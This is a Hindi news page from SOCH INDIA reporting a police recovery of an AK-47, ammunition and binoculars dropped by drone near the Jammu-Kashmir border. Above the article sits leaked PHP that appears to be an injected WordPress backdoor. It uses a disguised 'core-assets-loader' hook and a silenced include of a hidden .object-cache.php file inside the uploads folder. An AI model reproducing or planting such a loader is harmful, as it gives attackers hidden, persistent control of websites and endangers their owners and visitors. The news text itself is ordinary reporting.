add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); जम्मू-कश्मीर में ड्रोन से गिराए गए हथियार; AK-47 राइफल, नाइट विजन डिवाइस और गोलियां बरामद – SOCH INDIA
Menu

देश
जम्मू-कश्मीर में ड्रोन से गिराए गए हथियार; AK-47 राइफल, नाइट विजन डिवाइस और गोलियां बरामद

nobanner

जम्मू-कश्मीर पुलिस ने अंतरराष्ट्रीय सीमा के पास से हथियारों की एक खेप बरामद की है। ये हथियार पाकिस्तान से एक ड्रोन के जरिए गिराए गए थे। पुलिस अधिकारियों ने बताया कि गिराए गए पैकेट से एक AK-47 राइफल, तीन मैगजीन, 30 गोलियां और एक दूरबीन बरामद हुई है। यह बरामदगी इंटरनेशनल बॉर्डर से करीब 6 किलोमीटर दूर फलैन मंडल के सौंजना गांव से हुई।